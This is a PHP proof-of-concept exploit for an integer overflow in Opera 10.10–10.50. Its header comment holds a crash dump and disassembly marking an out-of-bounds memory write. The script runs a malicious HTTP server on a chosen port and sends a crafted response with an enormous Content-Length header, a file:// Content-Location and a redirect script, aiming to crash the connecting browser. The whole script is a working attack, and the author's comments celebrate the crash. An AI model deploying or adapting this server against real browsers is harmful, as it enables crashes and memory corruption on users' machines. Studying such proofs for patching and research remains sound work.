<?php
/*
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
*-------------------------------------------------------------------------------
* Opera 10.10 - 10.50
* Title: Integer overflow leading
* to
* out of bounds array access R/W
* 0day poc
* Autor: Marcin Ressel aka ~echo
* Date: 3.03.2010
* Software: http://choice.opera.com/download/get.pl?thanks=true&sub=true&wu=1&wulang=pl&info=1
* Version: Tested on 10.10 , 10.50 but i thing other version is vulnerable to
* Platform: Windows xp home sp 2 pl
* Muz: http://totgeliebt.wrzuta.pl/audio/6dXgnLnsI82 (podniecilem sie)
* Contanct: pokoFac_nerda@tvn24.pl
*
* @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
*
* Exception: Access violation when writing to [01A23000]
* Registers: EAX 03D89DF2
ECX 3FFF3ABE
EDX 00000002
EBX FFFFFFFF
ESP 0012F158
EBP 0012F160
ESI 03DBB2F8
EDI 01A23000
EIP 6781E0BA Opera_12.6781E0BA
* DUMP Function:
6781E060 55 PUSH EBP
6781E061 8BEC MOV EBP,ESP
6781E063 57 PUSH EDI
6781E064 56 PUSH ESI
6781E065 8B75 0C MOV ESI,DWORD PTR SS:[EBP+C]
6781E068 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10]
6781E06B 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
6781E06E 8BC1 MOV EAX,ECX
6781E070 8BD1 MOV EDX,ECX
6781E072 03C6 ADD EAX,ESI
6781E074 3BFE CMP EDI,ESI
6781E076 76 08 JBE SHORT Opera_12.6781E080
6781E078 3BF8 CMP EDI,EAX
6781E07A 0F82 A4010000 JB Opera_12.6781E224
6781E080 81F9 00010000 CMP ECX,100
6781E086 72 1F JB SHORT Opera_12.6781E0A7
6781E088 833D 882AF167 00 CMP DWORD PTR DS:[67F12A88],0
6781E08F 74 16 JE SHORT Opera_12.6781E0A7
6781E091 57 PUSH EDI
6781E092 56 PUSH ESI
6781E093 83E7 0F AND EDI,0F
6781E096 83E6 0F AND ESI,0F
6781E099 3BFE CMP EDI,ESI
6781E09B 5E POP ESI
6781E09C 5F POP EDI
6781E09D 75 08 JNZ SHORT Opera_12.6781E0A7
6781E09F 5E POP ESI
6781E0A0 5F POP EDI
6781E0A1 5D POP EBP
6781E0A2 ^E9 88CEFFFF JMP Opera_12.6781AF2F
6781E0A7 F7C7 03000000 TEST EDI,3
6781E0AD 75 15 JNZ SHORT Opera_12.6781E0C4
6781E0AF C1E9 02 SHR ECX,2
6781E0B2 83E2 03 AND EDX,3
6781E0B5 83F9 08 CMP ECX,8
6781E0B8 72 2A JB SHORT Opera_12.6781E0E4
BUG-> 6781E0BA F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] <-- BUG
6781E0BC FF2495 D4E18167 JMP DWORD PTR DS:[EDX*4+6781E1D4]
6781E0C3 90 NOP
6781E0C4 8BC7 MOV EAX,EDI
6781E0C6 BA 03000000 MOV EDX,3
6781E0CB 83E9 04 SUB ECX,4
6781E0CE 72 0C JB SHORT Opera_12.6781E0DC
6781E0D0 83E0 03 AND EAX,3
6781E0D3 03C8 ADD ECX,EAX
6781E0D5 FF2485 E8E08167 JMP DWORD PTR DS:[EAX*4+6781E0E8]
6781E0DC FF248D E4E18167 JMP DWORD PTR DS:[ECX*4+6781E1E4]
6781E0E3 90 NOP
6781E0E4 FF248D 68E18167 JMP DWORD PTR DS:[ECX*4+6781E168]
...
*---------------------------------------------------------------------------
* BREAK AT 6781E0BA
ECX=3FFF3ABE (decimal 1073691326.)
DS:[ESI]=[03DBB2F8]=00000000
ES:[EDI]=[01A23000]=???
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
*
*/
if(strtolower(substr($_ENV['OS'],0,3)) == "win") define('OS','win');
else define('OS','nix');
if(!extension_loaded('php_sockets'))
{
if((OS == 'win') && (!@dl('php_sockets.dll')) ||
((OS == 'nix') && (!@dl('php_sockets.so'))))
die('fatal php_sockets.[dll/so] '.
'not loaded '."\r\n"); //.__line__.' '.__file__."\r\n");
}
/*Generated by my own fuzzer*/
$EVIL = 'HTTP/1.1 200 ok'."\r\n".
'Transfer-Encoding: identity'."\r\n".
'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n".
'Server: moj zuy server'."\r\n".
'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".
'Content-Location: file://C:/boot.ini'."\r\n".
'Vary:negotiate,accept-language,accept-charset'."\r\n".
'Tcn: choice'."\r\n".
'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n".
'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".
'Accept-Ranges: bytes'."\r\n".
'Cache-Control: max-age=0'."\r\n".
'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n".
'Content-Encoding: identity'."\r\n".
'Content-Length:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999666'."\r\n".
'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n".
'Keep-Alive: timeout=15, max=300'."\r\n".
'Connection: keep-alive'."\r\n".
'Content-Type: text/html; charset=iso-8859-2'."\r\n".
'Age: 1'."\r\n".
'Allow: GET,HEAD'."\r\n".
'Content-Disposition: inline'."\r\n".
'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n".
'Warning: 199 Miscellaneous warning'."\r\n".
'Trailer: Max-Forwards'."\r\n".
'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n".
'Content-Range: bytes 21010-47021/47022'."\r\n".
'Content-Language: pl'."\r\n\r\n".
'<html><head></head><body style="background-color:red;color:white;text-align:center;"><b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>';
$buster = $argc - 1;// - 1;
if($buster > 0)
{
for($i = 1; $i<$buster; $i+=2)
if(('-port' == $argv[$i]) && ((int)$argv[$i + 1] > 0)) $PORT = $argv[$i + 1];
}
else $PORT = 81;
if(!($SOCKET = socket_create_listen($PORT)))
die('fatal socket init failed'."\r\n");
socket_set_option($SOCKET,SOL_SOCKET,
SO_RCVTIMEO,array("sec"=>3,"usec"=>0));
echo('SOCKET READY AT PORT '.$PORT."\r\n".
'Now connect here via opera'."\r\n");
if($CONNECT = socket_accept($SOCKET))
{
$recv_buffer = null;
echo('Connection ok '."\r\n");
if(socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL))
{
if(!@socket_write($CONNECT,$EVIL))
{
socket_close($CONNECT);
socket_close($SOCKET);
die('I cant send payload !'."\r\n");
}
}
else echo('Something wrong with client side'."\r\n");
usleep(120000);
socket_close($CONNECT);
socket_close($SOCKET);
}
echo('OK ya browser must be death now'."\r\n".
'Have a nice day lol'."\r\n");
//[2010-03-03 20:47:46]
//i cut be milion dolar man ;=
?>